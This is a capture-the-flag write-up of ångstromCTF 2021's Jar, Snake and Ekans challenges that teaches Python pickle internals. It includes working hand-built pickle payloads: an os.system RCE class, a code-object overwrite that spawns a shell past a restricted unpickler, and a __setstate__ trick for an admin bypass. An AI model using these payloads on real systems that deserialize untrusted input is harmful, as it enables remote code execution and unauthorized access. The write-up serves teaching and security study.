Table of Contents

ångstromCTF 2021 - Jar/Snake/Ekans

by Darin Mao on 4/15/2021

Jar, Snake, and Ekans were challenges about python pickles from ångstromCTF 2021. Jar was a pretty typical pickle challenge, but the latter two were not.

Pickle Internals

The pickle module is a pretty special bit of code that allows you to serialize and deserialize many different python classes. However, what is not immediately obvious is how this is accomplished. Rather than storing data directly, pickles store a series of instructions that tell the pickle VM how to recreate that data. When a pickle is loaded, it is not just deserialized; rather, it is executed by the pickle VM. This makes pickles a lot more powerful than something like JSON or YAML.

If you want to see what instructions a pickle contains, you can use pickletools.dis. For example:

>>> import pickle, pickletools >>> pickletools.dis(pickle.dumps([1, 2, 3, 4])) 0: \x80 PROTO 4 2: \x95 FRAME 13 11: ] EMPTY_LIST 12: \x94 MEMOIZE (as 0) 13: ( MARK 14: K BININT1 1 16: K BININT1 2 18: K BININT1 3 20: K BININT1 4 22: e APPENDS (MARK at 13) 23: . STOP

For more details on how pickle works, the source code for and is extremely helpful. Personally, I find pickle more useful because reading the source shows exactly what goes on when an opcode is executed, but pickletools has pretty in-depth documentation about each opcode. Since we’re mostly interested in what goes on during a pickle load, I recommend searching through pickle for load_opcode, where opcode is the opcode you’re interested in.

Note that, by default, the pickle module actually calls a C implementation (you can read the source here if you like). However, for all intents and purposes, we can consider the python and C implementations functionally equivalent.


Pickle is a stack-based VM, meaning that most of the data manipulation is done on a stack. However, there is also a second storage area called the memo, which is just a big dictionary with integer keys intended for saving values for use later. This is particularly helpful when deserializing many similar big objects, but we will not be using it very much.

Most opcodes will push something to the top of the stack. For example, UNICODE pushes a newline-terminated string from the pickle to the top of the stack, and INT pushes a newline-terminated string integer from the pickle to the top of the stack. There is also a special opcode, PROTO, which sets the protocol version of a pickle. Different protocols support different features, but they are generally backwards compatible, so it might be sensible to set the protocol to 4 or 5 at the beginning of your pickles.

There are far too many opcodes to go through all of them, so it is best to refer to the pickle source when necessary. That being said, there are a few special ones worth mentioning.


The MARK opcode is special because it allows you to create more complex types like lists and dictionaries. What it does is push a special “markobject” onto the stack, and then later opcodes can pop up to the last markobject. In this way, pickles can create many different things, and also nest them as deep as python will allow!

Side note: while the MARK opcode conceptually pushes a special “markobject,” this is not how it is implemented. It is helpful to think of it this way, but the pickle VM will actually just save the entire stack into another metastack (a stack of stacks), then put all future objects into an entirely new stack. Then, when an opcode pops until the mark, the pickle VM will restore the last saved stack from the metastack and return everything on the new stack.

Here’s an example:

>>> obj = {'a': 1, 'b': 'string', 'c': [1, 2, (3, 4, 5, 6, 7), {'d': None}]} >>> pickletools.dis(pickletools.optimize(pickle.dumps(obj))) 0: \x80 PROTO 4 2: \x95 FRAME 48 11: } EMPTY_DICT 12: ( MARK 13: \x8c SHORT_BINUNICODE 'a' 16: K BININT1 1 18: \x8c SHORT_BINUNICODE 'b' 21: \x8c SHORT_BINUNICODE 'string' 29: \x8c SHORT_BINUNICODE 'c' 32: ] EMPTY_LIST 33: ( MARK 34: K BININT1 1 36: K BININT1 2 38: ( MARK 39: K BININT1 3 41: K BININT1 4 43: K BININT1 5 45: K BININT1 6 47: K BININT1 7 49: t TUPLE (MARK at 38) 50: } EMPTY_DICT 51: \x8c SHORT_BINUNICODE 'd' 54: N NONE 55: s SETITEM 56: e APPENDS (MARK at 33) 57: u SETITEMS (MARK at 12) 58: . STOP

The use of pickletools.optimize here is irrelevant—all it does is remove all the MEMOIZE operations that pickle puts in by default, but the pickle remains functionally identical. As you can see, MARK allows pickles to nest data arbitrarily deeply!


The GLOBAL and STACK_GLOBAL opcodes are how pickles can access the outside world. They take two arguments—GLOBAL uses newline-terminated strings and STACK_GLOBAL uses the two items on the top of the stack—and calls find_class on them. For example, cMODULE\nNAME\n would call find_class('MODULE', 'NAME'). The default implementation of find_class is below:

def find_class(self, module, name): # Subclasses may override this. sys.audit('pickle.find_class', module, name) if self.proto < 3 and self.fix_imports: if (module, name) in _compat_pickle.NAME_MAPPING: module, name = _compat_pickle.NAME_MAPPING[(module, name)] elif module in _compat_pickle.IMPORT_MAPPING: module = _compat_pickle.IMPORT_MAPPING[module] __import__(module, level=0) if self.proto >= 4: return _getattribute(sys.modules[module], name)[0] else: return getattr(sys.modules[module], name)

find_class is essentially the only way that pickles can access anything beyond primitive like integers and lists. Everything we can access must come from here, and this is why restricted unpicklers will usually just implement this function. If the restricted find_class doesn’t allow access to something, then there is no way for pickles to directly get it either.


The REDUCE opcode is designed to allow classes to define a custom deserialization. The way the interface works is, classes can define a method called __reduce__ or __reduce_ex__ (they do slightly different things) that pickle will call when serializing them. Then, when the pickle is deserialized, it will call whatever function is specified.

Although the documentation specifies that __reduce__ should return either a string or a tuple with very specific elements, all of it just boils down to a very simple opcode:

def load_reduce(self): stack = self.stack args = stack.pop() func = stack[-1] stack[-1] = func(*args)

All this opcode does is pop a tuple of arguments off the stack, then call the top stack item as a function with those arguments. For our purposes, this is an important primitive—it allows us to call any function we can get access to.


The BUILD opcode is another interesting one.

def load_build(self): stack = self.stack state = stack.pop() inst = stack[-1] setstate = getattr(inst, "__setstate__", None) if setstate is not None: setstate(state) return slotstate = None if isinstance(state, tuple) and len(state) == 2: state, slotstate = state if state: inst_dict = inst.__dict__ intern = sys.intern for k, v in state.items(): if type(k) is str: inst_dict[intern(k)] = v else: inst_dict[k] = v if slotstate: for k, v in slotstate.items(): setattr(inst, k, v)

Take the time to read this one carefully, as it is very important. The BUILD opcode is extremely powerful, as it allows us to modify __dict__ of or even call setattr on anything we can get access to.


Finally, the STOP opcode does just that—it tells pickle to stop executing and return whatever is on the top of the stack. Note that pickletools will likely complain if the stack is not empty when STOP is reached, but the pickle module does not care. So, don’t worry too much about popping things off the stack when you’re done.

Jar (web, 70 points)

My other pickle challenges seem to be giving you all a hard time, so here’s a simpler one to get you warmed up.


Arbitrary Pickle Deserialization

In both endpoints, the server will load any pickle we give it.

@app.route('/') def jar(): contents = request.cookies.get('contents') if contents: items = pickle.loads(base64.b64decode(contents)) else: items = []

This is a classic challenge, and you can probably find a solution similar to the one below on the internet.

import pickle import base64 import os class RCE: def __reduce__(self): return os.system, ('ls -la',) # or whatever command here if __name__ == '__main__': pickled = pickle.dumps(RCE()) print(base64.urlsafe_b64encode(pickled))

This gives us RCE, and we can easily get the flag with a reverse shell or similar. However, this solution is lame, and with our new knowledge of pickles, we can do much better. Notice that the flag is stored as a global variable that we have access to. We can try using GLOBAL to grab it.

>>> p = GLOBAL + b'__main__\nflag\n' + STOP >>> pickle.loads(p) 'actf{FAKE_FLAG}'

This calls find_class('__main__', 'flag') as expected. However, the server expects a list, so we adjust accordingly.

>>> p = MARK + GLOBAL + b'__main__\nflag\n' + LIST + STOP >>> pickle.loads(p) ['actf{FAKE_FLAG}']

If we base64 encode this and set it as our cookie, we’ll get the flag.



Snake (misc, 240 points)

Snake is such a fun game. Slithering around, eating pickles, slamming into walls… that’s the life.


Restricted Pickle Deserialization

This challenge is much more difficult because it restricts what we can access through find_class.

class SnakeRestrictedUnpickler(pickle.Unpickler): def find_class(self, module, name): if module == "__main__" and name.startswith("Snake") and name.count(".") <= 1 and len(name) <= len("SnakeSave.HighScores"): return super().find_class(module, name) raise pickle.UnpicklingError(f"HACKING DETECTED")

Basically, we are allowed to load anything in the __main__ module that starts with Snake, has at most one period, and is no longer than twenty characters long. At first glance, this seems safe, but notice that the SnakeWindow function also matches these criteria. Furthermore, since we are allowed one period, we can access any attribute of SnakeWindow, as long as it is short enough.

Code Objects

In python, functions are actually objects that contain a code object. This code object contains, among other things, the bytecode of that function and all the objects it references. And by sheer conincidence, SnakeWindow.__code__ is just the right length to pass the restricted unpickler.

Unfortunately, we can’t just directly overwrite the bytecode of this code object to get arbitrary bytecode execution—that would be far too easy.

>>> setattr(SnakeWindow.__code__, 'co_code', b'noodles') Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: readonly attribute

However, if we could somehow make our own code object, then we can assign SnakeWindow.__code__ to it, and then when the program later calls SnakeWindow we will have arbitrary bytecode execution. Unfortunately, there is no easy way to get access to the code object constructor. If we could find a way to call type(SnakeWindow.__code__), then we would get the code object class, allowing us to construct a new code object.

__class__ Attribute

All python objects have a special attribute called __class__ that is a reference to the type of the current instance. For example:

>>> ().__class__ <class 'tuple'> >>> [].__class__ <class 'list'> >>> (1).__class__ <class 'int'>

Unfortunately, the restricted unpickler does not allow us to directly access SnakeWindow.__code__.__class__, as that would require two periods. Additionally, SnakeWindow.__class__ is too long.

But, what about SnakeSave? One might think that, since SnakeSave is a class rather than an instance, that __class__ is not defined at all. However, in python, classes are also objects themselves, instances of type!

>>> SnakeSave.__class__ <class 'type'>

This allows us to call type(SnakeWindow.__code__), just like we wanted!

>>> SnakeSave.__class__(SnakeWindow.__code__) <class 'code'>

Now that we have access to the code object constructor, all we need to do is call it with the right arguments (with REDUCE), then assign it to SnakeWindow.__code__ (with BUILD).

Building the Pickle

Note that SnakeWindow is called with one argument. So, we’ll create a function that takes one argument (the reset is to fix the terminal, since the function is called by ncurses). Then, we’ll print out all the necessary arguments to the code object constructor.

def lmao(xd): __import__('os').system('reset;sh') print(lmao.__code__.co_argcount) print(lmao.__code__.co_posonlyargcount) print(lmao.__code__.co_kwonlyargcount) print(lmao.__code__.co_nlocals) print(lmao.__code__.co_stacksize) print(lmao.__code__.co_flags) print(lmao.__code__.co_code) print(lmao.__code__.co_consts) print(lmao.__code__.co_names) print(lmao.__code__.co_varnames) print(lmao.__code__.co_filename) print(lmao.__code__.co_name) print(lmao.__code__.co_firstlineno) print(lmao.__code__.co_lnotab) print(lmao.__code__.co_freevars) print(lmao.__code__.co_cellvars)

Now, we’ll create a pickle to get the code object constructor and call it with these arguments, then assign it to SnakeWindow.__code__.

p = PROTO + b'\x04' + \ GLOBAL + b'__main__\nSnakeWindow\n' + \ NONE + \ MARK + \ UNICODE + b'__code__\n' + \ GLOBAL + b'__main__\nSnakeSave.__class__\n' + \ GLOBAL + b'__main__\nSnakeWindow.__code__\n' + \ TUPLE1 + REDUCE + \ MARK + \ BININT1 + b'\x01' + \ BININT1 + b'\x00' + \ BININT1 + b'\x00' + \ BININT1 + b'\x01' + \ BININT1 + b'\x03' + \ BININT1 + b'\x43' + \ SHORT_BINBYTES + b'\x12' + b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00' + \ NONE + UNICODE + b'os\n' + UNICODE + b'reset;sh\n' + TUPLE3 + \ UNICODE + b'__import__\n' + UNICODE + b'system\n' + TUPLE2 + \ UNICODE + b'xd\n' + TUPLE1 + \ UNICODE + b'\n' + \ UNICODE + b'lmao\n' + \ BININT1 + b'\x03' + \ SHORT_BINBYTES + b'\x02' + b'\x00\x01' + \ EMPTY_TUPLE + \ EMPTY_TUPLE + \ TUPLE + \ REDUCE + \ DICT + \ TUPLE2 + \ BUILD + \ STOP

We’re writing the pickle by hand because it builds character gives us much greater control than simply using pickle.dump. Starting from the inside out, this pickle constructs a code object with the necessary arguments, creates a dictionary {'__code__': code_obj}, creates a tuple (None, code_dict), and finally uses BUILD on SnakeWindow to eventually call setattr(SnakeWindow, '__code__', code_obj). If you don’t understand this fully, I highly recommend following pickletools.dis and stepping through it one instruction at a time.

Sure enough, unpickling this and then calling SnakeWindow results in a shell. However, since the result of our pickle is not a SnakeSave like the game expects, trying to access highScores will fail. This is not a problem, though, because overwriting the code object of SnakeWindow is already done at this point, so we can just remove the STOP and append a regular SnakeSave pickle at the end! Rather than try to generate this ourselves, we can just play a game.

import base64 save = base64.b64decode('gASVdwAAAAAAAACMCF9fbWFpbl9flIwJU25ha2VTYXZllJOUKYGUfZQojApoaWdoU2NvcmVzlGgAjBRTbmFrZVNhdmUuSGlnaFNjb3Jlc5STlCmBlH2UKIwGcGxheWVylIwDa2ZilIwGc2NvcmVzlF2USwJhdWKMBGdhbWWUTnViLg==') print(base64.b64encode(p + save).decode())

Inputting this save code results in a shell.



Ekans (web, 250 points)

I built myself a pokédex to keep track of all the cool pokémon I catch. There’s this secret pokémon I don’t want anyone to know about, so I used a SafeUnpickler and now nobody can see it! Try it for yourself:


Restricted Pickle Deserialization

The restrictions in this challenge are much more strict than the last one.

class SafeUnpickler(pickle.Unpickler): def find_class(self, module, name): if module == "db" and name == "User": return User raise pickle.UnpicklingError(f"HACKING DETECTED")

Basically, we can only access db.User and nothing else. In addition, web server is quite peculiar:

@app.route('/', methods=['GET', 'POST']) def pokedex(): db = importlib.util.find_spec('db').loader.load_module('db') if request.method == "POST": # make a new user and return if 'user' not in request.cookies: # send login page and return if db.load_user(request).is_admin(): # send admin panel (no flag) and return if not db.load_user(request).authenticated(): # send invalid credentials page # send pokedex page, hiding the flag if not db.load_user(request).is_admin()

We need to send a pickle such that is_admin returns False the first time but True the next time. While this may seem impossible, note that the route handler loads a fresh instance of db on every request, so we can potentially overwrite class attributes on db.User which could lead to some interesting behavior. If this were not the case, then competitors would interfere with each other, so we could rule out the possibility.

A Closer Look at BUILD

Look, again, at the beginning of the source code for load_build:

def load_build(self): stack = self.stack state = stack.pop() inst = stack[-1] setstate = getattr(inst, "__setstate__", None) if setstate is not None: setstate(state) return

Notice that if inst has a __setstate__ attribute, the build opcode will call that function instead. Most importantly, in this case, the build opcode will not continue to write to __dict__ or call setattr. This could lead to different behavior the next time it is invoked.

With this, we can form a plan. Our pickle should have the necessary attributes to make is_admin return True, use BUILD to set the necessary attributes to make is_admin return False, and finally use BUILD to set __setstate__ on the db.User class to any callable. On the next deserialization, the BUILD to make is_admin return False will do nothing, and our deserialized user will be an admin, allowing us to get the flag.

Building the Pickle

Once again, we will write our pickle manually. We have to be somewhat clever about how we execute our plan, because once __setstate__ is set, then BUILD will never work again. The solution is to set admin to True on the db.Admin class rather than an instance, so that all users are admins by default. Then, we can construct new users by using REDUCE on the constructor instead of using BUILD.

p = PROTO + b'\x04' + \ GLOBAL + b'db\nUser\n' + \ NONE + \ MARK + \ UNICODE + b'admin\n' + \ NEWTRUE + \ DICT + \ TUPLE2 + BUILD + \ EMPTY_TUPLE + REDUCE + \ MARK + \ UNICODE + b'admin\n' + \ NEWFALSE + \ DICT + \ BUILD + \ GLOBAL + b'db\nUser\n' + \ NONE + \ MARK + \ UNICODE + b'__setstate__\n' + \ GLOBAL + b'db\nUser\n' + \ DICT + \ TUPLE2 + BUILD + \ POP + \ STOP

This pickle first uses BUILD to set admin to True on the db.User class, then uses REDUCE to construct a new user object. Then, it uses BUILD again to set admin to False on the newly constructed user object. Lastly, it uses BUILD one last time to set __setstate__ to db.User on the db.User class. As with the last challenge, if you don’t understand this fully, I highly recommend following pickletools.dis and stepping through it one instruction at a time.

Encoding this pickle with base64 and setting it as our cookie gives the Pokédex page containing the flag.



Final Thoughts

Snake and Ekans were certainly very interesting challenges. I learned a lot about pickles, and also got a couple ideas for some potential future challenges 👀 Am I going to need to understand pickle internals for any real project? No, probably not. But that’s part of the fun, isn’t it?

Huge thanks to kmh for the great challenges 🙂